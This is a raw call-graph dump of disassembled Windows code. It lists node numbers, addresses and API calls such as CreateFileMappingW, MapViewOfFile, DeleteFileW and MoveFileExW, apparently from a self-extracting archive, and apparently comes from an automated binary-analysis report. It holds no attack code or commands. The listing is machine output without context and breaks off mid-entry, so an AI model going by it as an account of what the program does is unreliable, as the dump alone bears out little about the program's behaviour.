24077 2ee9d9 24072->24077 24086 2eea95 24072->24086 24075 2ee98c 24073->24075 24076 2ee9a2 24073->24076 24074->24077 24079 2ee9d2 FreeLibrary 24074->24079 24075->24074 24075->24076 24080 2ee7fb DloadReleaseSectionWriteAccess 6 API calls 24076->24080 24078 2eea37 GetProcAddress 24077->24078 24077->24086 24081 2eea47 GetLastError 24078->24081 24078->24086 24079->24077 24082 2ee9ad RaiseException 24080->24082 24083 2eea5a 24081->24083 24082->24070 24085 2ee7fb DloadReleaseSectionWriteAccess 6 API calls 24083->24085 24083->24086 24087 2eea7b RaiseException 24085->24087 24099 2ee7fb 24086->24099 24088 2ee5bb ___delayLoadHelper2@8 6 API calls 24087->24088 24089 2eea92 24088->24089 24089->24086 24091 2ee5ed 24090->24091 24092 2ee5c7 24090->24092 24091->24066 24107 2ee664 24092->24107 24094 2ee5cc 24095 2ee5e8 24094->24095 24110 2ee78d 24094->24110 24115 2ee5ee GetModuleHandleW GetProcAddress GetProcAddress 24095->24115 24098 2ee836 24098->24066 24100 2ee82f 24099->24100 24101 2ee80d 24099->24101 24100->24070 24102 2ee664 DloadReleaseSectionWriteAccess 3 API calls 24101->24102 24103 2ee812 24102->24103 24104 2ee82a 24103->24104 24105 2ee78d DloadProtectSection 3 API calls 24103->24105 24118 2ee831 GetModuleHandleW GetProcAddress GetProcAddress DloadReleaseSectionWriteAccess 24104->24118 24105->24104 24116 2ee5ee GetModuleHandleW GetProcAddress GetProcAddress 24107->24116 24109 2ee669 24109->24094 24112 2ee7a2 DloadProtectSection 24110->24112 24111 2ee7a8 24111->24095 24112->24111 24113 2ee7dd VirtualProtect 24112->24113 24117 2ee6a3 VirtualQuery GetSystemInfo 24112->24117 24113->24111 24115->24098 24116->24109 24117->24113 24118->24100 25347 2eb18d 78 API calls 25320 2ec793 97 API calls 4 library calls 25364 2ec793 102 API calls 5 library calls 25349 2e9580 CompareStringW ShowWindow SetWindowTextW GlobalAlloc WideCharToMultiByte 25322 2fb49d 6 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 25350 2df1e8 FreeLibrary 24271 2eeae7 24272 2eeaf1 24271->24272 24273 2ee85d ___delayLoadHelper2@8 14 API calls 24272->24273 24274 2eeafe 24273->24274 25324 2ef4e7 29 API calls _abort 24276 2d13e1 84 API calls 2 library calls 24277 2eb7e0 24278 2eb7ea __EH_prolog 24277->24278 24443 2d1316 24278->24443 24281 2ebf0f 24508 2ed69e 24281->24508 24282 2eb82a 24284 2eb841 24282->24284 24285 2eb89b 24282->24285 24286 2eb838 24282->24286 24291 2eb92e GetDlgItemTextW 24285->24291 24296 2eb8b1 24285->24296 24288 2eb83c 24286->24288 24294 2eb878 24286->24294 24288->24284 24297 2de617 53 API calls 24288->24297 24289 2ebf2a SendMessageW 24290 2ebf38 24289->24290 24292 2ebf52 GetDlgItem SendMessageW 24290->24292 24293 2ebf41 SendDlgItemMessageW 24290->24293 24291->24294 24295 2eb96b 24291->24295 24526 2ea64d GetCurrentDirectoryW 24292->24526 24293->24292 24294->24284 24299 2eb95f KiUserCallbackDispatcher 24294->24299 24300 2eb974 24295->24300 24301 2eb980 GetDlgItem 24295->24301 24302 2de617 53 API calls 24296->24302 24304 2eb85b 24297->24304 24299->24284 24300->24294 24314 2ebe55 24300->24314 24306 2eb9b7 SetFocus 24301->24306 24307 2eb994 SendMessageW SendMessageW 24301->24307 24303 2eb8ce SetDlgItemTextW 24302->24303 24308 2eb8d9 24303->24308 24548 2d124f SHGetMalloc 24304->24548 24305 2ebf82 GetDlgItem 24311 2ebf9f 24305->24311 24312 2ebfa5 SetWindowTextW 24305->24312 24309 2eb9c7 24306->24309 24322 2eb9e0 24306->24322 24307->24306 24308->24284 24316 2eb8e6 GetMessageW 24308->24316 24313 2de617 53 API calls 24309->24313 24311->24312 24527 2eabab GetClassNameW 24312->24527 24317 2eb9d1 24313->24317 24318 2de617 53 API calls 24314->24318 24316->24284 24320 2eb8fd IsDialogMessageW 24316->24320 24549 2ed4d4 24317->24549 24324 2ebe65 SetDlgItemTextW 24318->24324 24320->24308 24327 2eb90c TranslateMessage DispatchMessageW 24320->24327 24329 2de617 53 API calls 24322->24329 24323 2ec1fc SetDlgItemTextW 24323->24284 24328 2ebe79 24324->24328 24327->24308 24330 2de617 53 API calls 24328->24330 24332 2eba17 24329->24332 24365 2ebe9c _wcslen 24330->24365 24331 2ebff0 24336 2ec020 24331->24336 24339 2de617 53 API calls 24331->24339 24337 2d4092 _swprintf 51 API calls 24332->24337 24333 2eb9d9 24453 2da0b1 24333->24453 24335 2ec73f 97 API calls 24335->24331 24345 2ec73f 97 API calls 24336->24345 24386 2ec0d8 24336->24386 24340 2eba29 24337->24340 24344 2ec003 SetDlgItemTextW 24339->24344 24346 2ed4d4 16 API calls 24340->24346 24341 2ec18b 24347 2ec19d 24341->24347 24348 2ec194 EnableWindow 24341->24348 24342 2eba73 24459 2eac04 SetCurrentDirectoryW 24342->24459 24343 2eba68 GetLastError 24343->24342 24350 2de617 53 API calls 24344->24350 24352 2ec03b 24345->24352 24346->24333 24353 2ec1ba 24347->24353 24567 2d12d3 GetDlgItem EnableWindow 24347->24567 24348->24347 24349 2ebeed 24356 2de617 53 API calls 24349->24356 24354 2ec017 SetDlgItemTextW 24350->24354 24357 2ec04d 24352->24357 24391 2ec072 24352->24391 24360 2ec1e1 24353->24360 24375 2ec1d9 SendMessageW 24353->24375 24354->24336 24355 2eba87 24361 2eba90 GetLastError 24355->24361 24362 2eba9e 24355->24362 24356->24284 24565 2e9ed5 32 API calls 24357->24565 24358 2ec0cb 24366 2ec73f 97 API calls 24358->24366 24360->24284 24370 2de617 53 API calls 24360->24370 24361->24362 24367 2ebb11 24362->24367 24368 2ebaae GetTickCount 24362->24368 24369 2ebb20 24362->24369 24364 2ec1b0 24568 2d12d3 GetDlgItem EnableWindow 24364->24568 24365->24349 24371 2de617 53 API calls 24365->24371 24366->24386 24367->24369 24372 2ebd56 24367->24372 24377 2d4092 _swprintf 51 API calls 24368->24377 24380 2ebcfb 24369->24380 24381 2ebb39 GetModuleFileNameW 24369->24381 24382 2ebcf1 24369->24382 24378 2eb862 24370->24378 24379 2ebed0 24371->24379 24468 2d12f1 GetDlgItem ShowWindow 24372->24468 24373 2ec066 24373->24391 24375->24360 24385 2ebac7 24377->24385 24378->24284 24378->24323 24387 2d4092 _swprintf 51 API calls 24379->24387 24390 2de617 53 API calls 24380->24390 24559 2df28c 82 API calls 24381->24559 24382->24294 24382->24380 24383 2ec169 24566 2e9ed5 32 API calls 24383->24566 24384 2ebd66 24469 2d12f1 GetDlgItem ShowWindow 24384->24469 24460 2d966e 24385->24460 24386->24341 24386->24383 24393 2de617 53 API calls 24386->24393 24387->24349 24396 2ebd05 24390->24396 24391->24358 24397 2ec73f 97 API calls 24391->24397 24393->24386 24394 2ebb5f 24399 2d4092 _swprintf 51 API calls 24394->24399 24395 2ec188 24395->24341 24400 2d4092 _swprintf 51 API calls 24396->24400 24401 2ec0a0 24397->24401 24398 2ebd70 24402 2de617 53 API calls 24398->24402 24404 2ebb81 CreateFileMappingW 24399->24404 24405 2ebd23 24400->24405 24401->24358 24406 2ec0a9 DialogBoxParamW 24401->24406 24407 2ebd7a SetDlgItemTextW 24402->24407 24409 2ebbe3 GetCommandLineW 24404->24409 24437 2ebc60 __InternalCxxFrameHandler 24404->24437 24417 2de617 53 API calls 24405->24417 24406->24294 24406->24358 24470 2d12f1 GetDlgItem ShowWindow 24407->24470 24408 2ebaed 24411 2ebaf4 GetLastError 24408->24411 24412 2ebaff 24408->24412 24413 2ebbf4 24409->24413 24411->24412 24415 2d959a 80 API calls 24412->24415 24560 2eb425 SHGetMalloc 24413->24560 24414 2ebd8c SetDlgItemTextW GetDlgItem 24418 2ebda9 GetWindowLongW SetWindowLongW 24414->24418 24419 2ebdc1 24414->24419 24415->24367 24421 2ebd3d 24417->24421 24418->24419 24471 2ec73f 24419->24471 24420 2ebc10 24561 2eb425 SHGetMalloc 24420->24561 24425 2ebc1c 24562 2eb425 SHGetMalloc 24425->24562 24426 2ec73f 97 API calls 24428 2ebddd 24426->24428 24496 2eda52 24428->24496 24429 2ebc28 24563 2df3fa 82 API calls 2 library calls 24429->24563 24430 2ebccb 24430->24382 24436 2ebce1 UnmapViewOfFile CloseHandle 24430->24436 24434 2ebc3f MapViewOfFile 24434->24437 24435 2ec73f 97 API calls 24441 2ebe03 24435->24441 24436->24382 24437->24430 24438 2ebcb7 Sleep 24437->24438 24438->24430 24438->24437 24439 2ebe2c 24564 2d12d3 GetDlgItem EnableWindow 24439->24564 24441->24439 24442 2ec73f 97 API calls 24441->24442 24442->24439 24444 2d131f 24443->24444 24445 2d1378 24443->24445 24447 2d1385 24444->24447 24569 2de2e8 62 API calls 2 library calls 24444->24569 24570 2de2c1 GetWindowLongW SetWindowLongW 24445->24570 24447->24281 24447->24282 24447->24284 24449 2d1341 24449->24447 24450 2d1354 GetDlgItem 24449->24450 24450->24447 24451 2d1364 24450->24451 24451->24447 24452 2d136a SetWindowTextW 24451->24452 24452->24447 24456 2da0bb 24453->24456 24454 2da14c 24455 2da2b2 8 API calls 24454->24455 24457 2da175 24454->24457 24455->24457 24456->24454 24456->24457 24571 2da2b2 24456->24571 24457->24342 24457->24343 24459->24355 24461 2d9678 24460->24461 24462 2d96d5 CreateFileW 24461->24462 24463 2d96c9 24461->24463 24462->24463 24464 2d971f 24463->24464 24465 2dbb03 GetCurrentDirectoryW 24463->24465 24464->24408 24466 2d9704 24465->24466 24466->24464 24467 2d9708 CreateFileW 24466->24467 24467->24464 24468->24384 24469->24398 24470->24414 24472 2ec749 __EH_prolog 24471->24472 24473 2ebdcf 24472->24473 24603 2eb314 24472->24603 24473->24426 24476 2eb314 ExpandEnvironmentStringsW 24486 2ec780 _wcslen _wcsrchr 24476->24486 24477 2eca67 SetWindowTextW 24477->24486 24482 2ec855 SetFileAttributesW 24484 2ec90f GetFileAttributesW 24482->24484 24485 2ec86f __cftof _wcslen 24482->24485 24484->24486 24488 2ec921 DeleteFileW 24484->24488 24485->24484 24485->24486 24609 2db991 51 API calls 3 library calls 24485->24609 24486->24473 24486->24476 24486->24477 24486->24482 24489 2ecc31 GetDlgItem SetWindowTextW SendMessageW 24486->24489 24491 2ecc71 SendMessageW 24486->24491 24607 2e1fbb CompareStringW 24486->24607 24608 2ea64d GetCurrentDirectoryW 24486->24608 24610 2da5d1 6 API calls 24486->24610 24611 2da55a FindClose 24486->24611 24612 2eb48e 76 API calls 2 library calls 24486->24612 24613 2f3e3e 24486->24613 24488->24486 24493 2ec932 24488->24493 24489->24486 24490 2d4092 _swprintf 51 API calls 24492 2ec952 GetFileAttributesW 24490->24492 24491->24486 24492->24493 24494 2ec967 MoveFileW 24492->24494 24493->24490 24494->24486 24495 2ec97f MoveFileExW 24494->24495 24495->24486 24497 2eda5c __EH_prolog 24496->24497 24628 2e0659 24497->24628 24499 2eda8d 24632 2d5b3d 24499->24632 24501 2edaab 24636 2d7b0d 24501->24636 24505 2edafe 24652 2d7b9e 24505->24652 24507 2ebdee 24507->24435 24509 2ed6a8 24508->24509 24510 2ea5c6 4 API calls 24509->24510 24511 2ed6ad 24510->24511 24512 2ed6b5 GetWindow 24511->24512 24513 2ebf15 24511->24513 24512->24513 24516 2ed6d5 24512->24516 24513->24289 24513->24290 24514 2ed6e2 GetClassNameW 25133 2e1fbb CompareStringW 24514->25133 24516->24513 24516->24514 24517 2ed76a GetWindow 24516->24517 24518 2ed706 GetWindowLongW 24516->24518 24517->24513 24517->24516 24518->24517 24519 2ed716 SendMessageW 24518->24519 24519->24517 24520 2ed72c GetObjectW 24519->24520 25134 2ea605 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 24520->25134 24522 2ed743 25135 2ea5e4 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 24522->25135 25136 2ea80c 8 API calls 24522->25136 24525 2ed754 SendMessageW DeleteObject 24525->24517 24526->24305 24528 2eabcc 24527->24528 24529 2eabf1 24527->24529 25137 2e1fbb CompareStringW 24528->25137 24531 2eabff 24529->24531 24532 2eabf6 SHAutoComplete 24529->24532 24535 2eb093 24531->24535 24532->24531 24533 2eabdf 24533->24529 24534 2eabe3 FindWindowExW 24533->24534 24534->24529 24536 2eb09d __EH_prolog 24535->24536 24537 2d13dc 84 API calls 24536->24537 24538 2eb0bf 24537->24538 25138 2d1fdc 24538->25138 24541 2eb0eb 24544 2d19af 128 API calls 24541->24544 24542 2eb0d9 24543 2d1692 86 API calls 24542->24543 24545 2eb0e4 24543->24545 24547 2eb10d __InternalCxxFrameHandler ___std_exception_copy 24544->24547 24545->24331 24545->24335 24546 2d1692 86 API calls 24546->24545 24547->24546 24548->24378 25146 2eb568 PeekMessageW 24549->25146 24552 2ed536 SendMessageW SendMessageW 24554 2ed572 24552->24554 24555 2ed591 SendMessageW SendMessageW SendMessageW 24552->24555 24553 2ed502 24558 2ed50d ShowWindow SendMessageW SendMessageW 24553->24558 24554->24555 24556 2ed5e7 SendMessageW 24555->24556 24557 2ed5c4 SendMessageW 24555->24557 24556->24333 24557->24556 24558->24552 24559->24394 24560->24420 24561->24425 24562->24429 24563->24434 24564->24300 24565->24373 24566->24395 24567->24364 24568->24353 24569->24449 24570->24447 24572 2da2bf 24571->24572 24573 2da2e3 24572->24573 24574 2da2d6 CreateDirectoryW 24572->24574 24592 2da231 24573->24592 24574->24573 24576 2da316 24574->24576 24579 2da325 24576->24579 24584 2da4ed 24576->24584 24578 2da329 GetLastError 24578->24579 24579->24456 24580 2dbb03 GetCurrentDirectoryW 24582 2da2ff 24580->24582 24582->24578 24583 2da303 CreateDirectoryW 24582->24583 24583->24576 24583->24578 24585 2eec50 24584->24585 24586 2da4fa SetFileAttributesW 24585->24586 24587 2da53d 24586->24587 24588 2da510 24586->24588 24587->24579 24589 2dbb03 GetCurrentDirectoryW 24588->24589 24590 2da524 24589->24590 24590->24587 24591 2da528 SetFileAttributesW 24590->24591 24591->24587 24595 2da243 24592->24595 24596 2eec50 24595->24596 24597 2da250 GetFileAttributesW 24596->24597 24598 2da23a 24597->24598 24599 2da261 24597->24599 24598->24578 24598->24580 24600 2dbb03 GetCurrentDirectoryW 24599->24600 24601 2da275 24600->24601 24601->24598 24602 2da279 GetFileAttributesW 24601->24602 24602->24598 24604 2eb31e 24603->24604 24605 2eb40d 24604->24605 24606 2eb3f0 ExpandEnvironmentStringsW 24604->24606 24605->24486 24606->24605 24607->24486 24608->24486 24609->24485 24610->24486 24611->24486 24612->24486 24614 2f8e54 24613->24614 24615 2f8e6c 24614->24615 24616 2f8e61 24614->24616 24618 2f8e74 24615->24618 24625 2f8e7d _abort 24615->24625 24617 2f8e06 __vswprintf_c_l 21 API calls 24616->24617 24623 2f8e69 24617->24623 24619 2f8dcc _free 20 API calls 24618->24619 24619->24623 24620 2f8ea7 HeapReAlloc 24620->24623 24620->24625 24621 2f8e82 24626 2f91a8 20 API calls __dosmaperr 24621->24626 24623->24486 24625->24620 24625->24621 24627 2f7a5e 7 API calls 2 library calls 24625->24627 24626->24623 24627->24625 24629 2e0666 _wcslen 24628->24629 24656 2d17e9 24629->24656 24631 2e067e 24631->24499 24633 2e0659 _wcslen 24632->24633 24634 2d17e9 78 API calls 24633->24634 24635 2e067e 24634->24635 24635->24501 24637 2d7b17 __EH_prolog 24636->24637 24673 2dce40 24637->24673 24639 2d7b32 24640 2eeb38 8 API calls 24639->24640 24641 2d7b5c 24640->24641 24679 2e4a76 24641->24679 24644 2d7c7d 24645 2d7c87 24644->24645 24647 2d7cf1 24645->24647 24708 2da56d 24645->24708 24650 2d7d50 24647->24650 24686 2d8284 24647->24686 24648 2d7d92 24648->24505 24650->24648 24714 2d138b 74 API calls 24650->24714 24653 2d7bac 24652->24653 24655 2d7bb3 24652->24655 24654 2e2297 86 API calls 24653->24654 24654->24655 24657 2d17ff 24656->24657 24668 2d185a __InternalCxxFrameHandler 24656->24668 24658 2d1828 24657->24658 24669 2d6c36 76 API calls __vswprintf_c_l 24657->24669 24660 2d1887 24658->24660 24665 2d1847 ___std_exception_copy 24658->24665 24662 2f3e3e 22 API calls 24660->24662 24661 2d181e 24670 2d6ca7 75 API calls 24661->24670 24664 2d188e 24662->24664 24664->24668 24672 2d6ca7 75 API calls 24664->24672 24665->24668 24671 2d6ca7 75 API calls 24665->24671 24668->24631 24669->24661 24670->24658 24671->24668 24672->24668 24674 2dce4a __EH_prolog 24673->24674 24675 2eeb38 8 API calls 24674->24675 24676 2dce8d 24675->24676 24677 2eeb38 8 API calls 24676->24677 24678 2dceb1 24677->24678 24678->24639 24680 2e4a80 __EH_prolog 24679->24680 24681 2eeb38 8 API calls 24680->24681 24682 2e4a9c 24681->24682 24683 2d7b8b 24682->24683 24685 2e0e46 80 API calls 24682->24685 24683->24644 24685->24683 24687 2d828e __EH_prolog 24686->24687 24715 2d13dc 24687->24715 24689 2d82aa 24690 2d82bb 24689->24690 24858 2d9f42 24689->24858 24694 2d82f2 24690->24694 24723 2d1a04 24690->24723 24854 2d1692 24694->24854 24696 2d8389 24742 2d8430 24696->24742 24700 2d83e8 24750 2d1f6d 24700->24750 24703 2d83f3 24703->24694 24754 2d3b2d 24703->24754 24766 2d848e 24703->24766 24705 2da56d 7 API calls 24706 2d82ee 24705->24706 24706->24694 24706->24696 24706->24705 24862 2dc0c5 CompareStringW _wcslen 24706->24862 24709 2da582 24708->24709 24713 2da5b0 24709->24713 25122 2da69b 24709->25122 24711 2da592 24712 2da597 FindClose 24711->24712 24711->24713 24712->24713 24713->24645 24714->24648 24716 2d13e1 __EH_prolog 24715->24716 24717 2dce40 8 API calls 24716->24717 24718 2d1419 24717->24718 24719 2eeb38 8 API calls 24718->24719 24722 2d1474 __cftof 24718->24722 24720 2d1461 24719->24720 24720->24722 24863 2db505 24720->24863 24722->24689 24724 2d1a0e __EH_prolog 24723->24724 24736 2d1a61 24724->24736 24739 2d1b9b 24724->24739 24879 2d13ba 24724->24879 24727 2d1bc7 24882 2d138b 74 API calls 24727->24882 24729 2d3b2d 101 API calls 24732 2d1c12 24729->24732 24730 2d1bd4 24730->24729 24730->24739 24731 2d1c5a 24735 2d1c8d 24731->24735 24731->24739 24883 2d138b 74 API calls 24731->24883 24732->24731 24734 2d3b2d 101 API calls 24732->24734 24734->24732 24735->24739 24740 2d9e80 79 API calls 24735->24740 24736->24727 24736->24730 24736->24739 24737 2d3b2d 101 API calls 24738 2d1cde 24737->24738 24738->24737 24738->24739 24739->24706 24740->24738 24741 2d9e80 79 API calls 24741->24736 24901 2dcf3d 24742->24901 24744 2d8440 24905 2e13d2 GetSystemTime SystemTimeToFileTime 24744->24905 24746 2d83a3 24746->24700 24747 2e1b66 24746->24747 24910 2ede6b 24747->24910 24751 2d1f72 __EH_prolog 24750->24751 24753 2d1fa6 24751->24753 24918 2d19af 24751->24918 24753->24703 24755 2d3b3d 24754->24755 24756 2d3b39 24754->24756 24765 2d9e80 79 API calls 24755->24765 24756->24703 24757 2d3b4f 24758 2d3b78 24757->24758 24759 2d3b6a 24757->24759 25049 2d286b 101 API calls 3 library calls 24758->25049 24760 2d3baa 24759->24760 25048 2d32f7 89 API calls 2 library calls 24759->25048 24760->24703 24763 2d3b76 24763->24760 25050 2d20d7 74 API calls 24763->25050 24765->24757 24767 2d8498 __EH_prolog 24766->24767 24770 2d84d5 24767->24770 24777 2d8513 24767->24777 25075 2e8c8d 103 API calls 24767->25075 24769 2d84f5 24771 2d851c 24769->24771 24772 2d84fa 24769->24772 24770->24769 24775 2d857a 24770->24775 24770->24777 24771->24777 25077 2e8c8d 103 API calls 24771->25077 24772->24777 25076 2d7a0d 152 API calls 24772->25076 24775->24777 25051 2d5d1a 24775->25051 24777->24703 24778 2d8605 24778->24777 25057 2d8167 24778->25057 24780 2d8797 24782 2da56d 7 API calls 24780->24782 24783 2d8802 24780->24783 24782->24783 25063 2d7c0d 24783->25063 24785 2dd051 82 API calls 24791 2d885d 24785->24791 24786 2d898b 25080 2d2021 74 API calls 24786->25080 24787 2d8992 24788 2d8a5f 24787->24788 24794 2d89e1 24787->24794 24792 2d8ab6 24788->24792 24807 2d8a6a 24788->24807 24791->24777 24791->24785 24791->24786 24791->24787 25078 2d8117 84 API calls 24791->25078 25079 2d2021 74 API calls 24791->25079 24799 2d8a4c 24792->24799 25083 2d7fc0 97 API calls 24792->25083 24793 2d8ab4 24800 2d959a 80 API calls 24793->24800 24796 2d8b14 24794->24796 24794->24799 24801 2da231 3 API calls 24794->24801 24795 2d9105 24798 2d959a 80 API calls 24795->24798 24796->24795 24797 2d8b82 24796->24797 25084 2d98bc 24796->25084 24805 2dab1a 8 API calls 24797->24805 24798->24777 24799->24793 24799->24796 24800->24777 24803 2d8a19 24801->24803 24803->24799 25081 2d92a3 97 API calls 24803->25081 24808 2d8bd1 24805->24808 24807->24793 25082 2d7db2 101 API calls 24807->25082 24810 2dab1a 8 API calls 24808->24810 24825 2d8be7 24810->24825 24813 2d8b70 25088 2d6e98 77 API calls 24813->25088 24815 2d8cbc 24816 2d8d18 24815->24816 24817 2d8e40 24815->24817 24818 2d8d8a 24816->24818 24819 2d8d28 24816->24819 24820 2d8e66 24817->24820 24821 2d8e52 24817->24821 24840 2d8d49 24817->24840 24826 2d8167 19 API calls 24818->24826 24822 2d8d6e 24819->24822 24830 2d8d37 24819->24830 24824 2e3377 75 API calls 24820->24824 24823 2d9215 123 API calls 24821->24823 24822->24840 25091 2d77b8 111 API calls 24822->25091 24823->24840 24827 2d8e7f 24824->24827 24825->24815 24828 2d8c93 24825->24828 24835 2d981a 79 API calls 24825->24835 24829 2d8dbd 24826->24829 25094 2e3020 123 API calls 24827->25094 24828->24815 25089 2d9a3c 82 API calls 24828->25089 24836 2d8df5 24829->24836 24837 2d8de6 24829->24837 24829->24840 25090 2d2021 74 API calls 24830->25090 24835->24828 25093 2d9155 93 API calls __EH_prolog 24836->25093 25092 2d7542 85 API calls 24837->25092 24843 2d8f85 24840->24843 25095 2d2021 74 API calls 24840->25095 24842 2d9090 24842->24795 24844 2da4ed 3 API calls 24842->24844 24843->24795 24843->24842 24845 2d903e 24843->24845 25069 2d9f09 SetEndOfFile 24843->25069 24848 2d90eb 24844->24848 25070 2d9da2 24845->25070 24848->24795 25096 2d2021 74 API calls 24848->25096 24849 2d9085 24851 2d9620 77 API calls 24849->24851 24851->24842 24852 2d90fb 25097 2d6dcb 76 API calls _wcschr 24852->25097 24855 2d16a4 24854->24855 25113 2dcee1 24855->25113 24859 2d9f59 24858->24859 24860 2d9f63 24859->24860 25121 2d6d0c 78 API calls 24859->25121 24860->24690 24862->24706 24864 2db50f __EH_prolog 24863->24864 24869 2df1d0 82 API calls 24864->24869 24866 2db521 24870 2db61e 24866->24870 24869->24866 24871 2db630 __cftof 24870->24871 24874 2e10dc 24871->24874 24877 2e109e GetCurrentProcess GetProcessAffinityMask 24874->24877 24878 2db597 24877->24878 24878->24722 24884 2d1732 24879->24884 24881 2d13d6 24881->24741 24882->24739 24883->24735 24885 2d1748 24884->24885 24896 2d17a0 __InternalCxxFrameHandler 24884->24896 24886 2d1771 24885->24886 24897 2d6c36 76 API calls __vswprintf_c_l 24885->24897 24887 2d17c7 24886->24887 24890 2d178d ___std_exception_copy 24886->24890 24889 2f3e3e 22 API calls 24887->24889 24892 2d17ce 24889->24892 24890->24896 24899 2d6ca7 75 API calls 24890->24899 24891 2d1767 24898 2d6ca7 75 API calls 24891->24898 24892->24896 24900 2d6ca7 75 API calls 24892->24900 24896->24881 24897->24891 24898->24886 24899->24896 24900->24896 24902 2dcf4d 24901->24902 24904 2dcf54 24901->24904 24906 2d981a 24902->24906 24904->24744 24905->24746 24907 2d9833 24906->24907 24909 2d9e80 79 API calls 24907->24909 24908 2d9865 24908->24904 24909->24908 24911 2ede78 24910->24911 24912 2de617 53 API calls 24911->24912 24913 2ede9b 24912->24913 24914 2d4092 _swprintf 51 API calls 24913->24914 24915 2edead 24914->24915 24916 2ed4d4 16 API calls 24915->24916 24917 2e1b7c 24916->24917 24917->24700 24919 2d19bf 24918->24919 24921 2d19bb 24918->24921 24922 2d18f6 24919->24922 24921->24753 24923 2d1908 24922->24923 24924 2d1945 24922->24924 24925 2d3b2d 101 API calls 24923->24925 24930 2d3fa3 24924->24930 24928 2d1928 24925->24928 24928->24921 24934 2d3fac 24930->24934 24931 2d3b2d 101 API calls 24931->24934 24932 2d1966 24932->24928 24935 2d1e50 24932->24935 24934->24931 24934->24932 24947 2e0e08 24934->24947 24936 2d1e5a __EH_prolog 24935->24936 24955 2d3bba 24936->24955 24938 2d1e84 24939 2d1732 78 API calls 24938->24939 24942 2d1f0b 24938->24942 24940 2d1e9b 24939->24940 24983 2d18a9 78 API calls 24940->24983 24942->24928 24943 2d1eb3 24945 2d1ebf _wcslen 24943->24945 24984 2e1b84 MultiByteToWideChar 24943->24984 24985 2d18a9 78 API calls 24945->24985 24948 2e0e0f 24947->24948 24949 2e0e2a 24948->24949 24953 2d6c31 RaiseException CallUnexpected 24948->24953 24951 2e0e3b SetThreadExecutionState 24949->24951 24954 2d6c31 RaiseException CallUnexpected 24949->24954 24951->24934 24953->24949 24954->24951 24956 2d3bc4 __EH_prolog 24955->24956 24957 2d3bda 24956->24957 24958 2d3bf6 24956->24958 25011 2d138b 74 API calls 24957->25011 24959 2d3e51 24958->24959 24963 2d3c22 24958->24963 25028 2d138b 74 API calls 24959->25028 24962 2d3be5 24962->24938 24963->24962 24986 2e3377 24963->24986 24965 2d3ca3 24966 2d3d2e 24965->24966 24982 2d3c9a 24965->24982 25014 2dd051 24965->25014 24996 2dab1a 24966->24996 24967 2d3c9f 24967->24965 25013 2d20bd 78 API calls 24967->25013 24969 2d3c8f 25012 2d138b 74 API calls 24969->25012 24970 2d3c71 24970->24965 24970->24967 24970->24969 24975 2d3d41 24976 2d3dd7 24975->24976 24977 2d3dc7 24975->24977 25020 2e3020 123 API calls 24976->25020 25000 2d9215 24977->25000 24980 2d3dd5 24980->24982 25021 2d2021 74 API calls 24980->25021 25022 2e2297 24982->25022 24983->24943 24984->24945 24985->24942 24987 2e338c 24986->24987 24989 2e3396 ___std_exception_copy 24986->24989 25029 2d6ca7 75 API calls 24987->25029 24990 2e341c 24989->24990 24991 2e34c6 24989->24991 24992 2e3440 __cftof 24989->24992 25030 2e32aa 75 API calls 3 library calls 24990->25030 25031 2f238d RaiseException 24991->25031 24992->24970 24995 2e34f2 24997 2dab28 24996->24997 24999 2dab32 24996->24999 24998 2eeb38 8 API calls 24997->24998 24998->24999 24999->24975 25001 2d921f __EH_prolog 25000->25001 25032 2d7c64 25001->25032 25004 2d13ba 78 API calls 25005 2d9231 25004->25005 25035 2dd114 25005->25035 25007 2d928a 25007->24980 25009 2dd114 118 API calls 25010 2d9243 25009->25010 25010->25007 25010->25009 25044 2dd300 97 API calls __InternalCxxFrameHandler 25010->25044 25011->24962 25012->24982 25013->24965 25015 2dd084 25014->25015 25016 2dd072 25014->25016 25046 2d603a 82 API calls 25015->25046 25045 2d603a 82 API calls 25016->25045 25019 2dd07c 25019->24966 25020->24980 25021->24982 25025 2e22a1 25022->25025 25023 2e22ce 25024 2e22ba 25047 2e0eed 86 API calls 25024->25047 25025->25023 25025->25024 25027 2e22c1 25027->25023 25028->24962 25029->24989 25030->24992 25031->24995 25033 2db146 GetVersionExW 25032->25033 25034 2d7c69 25033->25034 25034->25004 25041 2dd12a __InternalCxxFrameHandler 25035->25041 25036 2dd29a 25037 2dd2ce 25036->25037 25038 2dd0cb 6 API calls 25036->25038 25039 2e0e08 SetThreadExecutionState RaiseException 25037->25039 25038->25037 25042 2dd291 25039->25042 25040 2e8c8d 103 API calls 25040->25041 25041->25036 25041->25040 25041->25042 25043 2dac05 91 API calls 25041->25043 25042->25010 25043->25041 25044->25010 25045->25019 25046->25019 25047->25027 25048->24763 25049->24763 25050->24760 25052 2d5d2a 25051->25052 25098 2d5c4b 25052->25098 25054 2d5d5d 25056 2d5d95 25054->25056 25103 2db1dc CharUpperW CompareStringW _wcslen ___vcrt_FlsGetValue 25054->25103 25056->24778 25058 2d8186 25057->25058 25059 2d8232 25058->25059 25110 2dbe5e 19 API calls __InternalCxxFrameHandler 25058->25110 25109 2e1fac CharUpperW 25059->25109 25062 2d823b 25062->24780 25064 2d7c22 25063->25064 25065 2d7c5a 25064->25065 25111 2d6e7a 74 API calls 25064->25111 25065->24791 25067 2d7c52 25112 2d138b 74 API calls 25067->25112 25069->24845 25071 2d9db3 25070->25071 25074 2d9dc2 25070->25074 25072 2d9db9 FlushFileBuffers 25071->25072 25071->25074 25072->25074 25073 2d9e3f SetFileTime 25073->24849 25074->25073 25075->24770 25076->24777 25077->24777 25078->24791 25079->24791 25080->24787 25081->24799 25082->24793 25083->24799 25085 2d98c5 GetFileType 25084->25085 25086 2d8b5a 25084->25086 25085->25086 25086->24797 25087 2d2021 74 API calls 25086->25087 25087->24813 25088->24797 25089->24815 25090->24840 25091->24840 25092->24840 25093->24840 25094->24840 25095->24843 25096->24852 25097->24795 25104 2d5b48 25098->25104 25101 2d5c6c 25101->25054 25102 2d5b48 2 API calls 25102->25101 25103->25054 25106 2d5b52 25104->25106 25105 2d5c3a 25105->25101 25105->25102 25106->25105 25108 2db1dc CharUpperW CompareStringW _wcslen ___vcrt_FlsGetValue 25106->25108 25108->25106 25109->25062 25110->25059 25111->25067 25112->25065 25117 2dcef2 25113->25117 25115 2dcf24 25120 2da99e 86 API calls 25115->25120 25119 2da99e 86 API calls 25117->25119 25118 2dcf2f 25119->25115 25120->25118 25121->24860 25123 2da6a8 25122->25123 25124 2da727 FindNextFileW 25123->25124 25125 2da6c1 FindFirstFileW 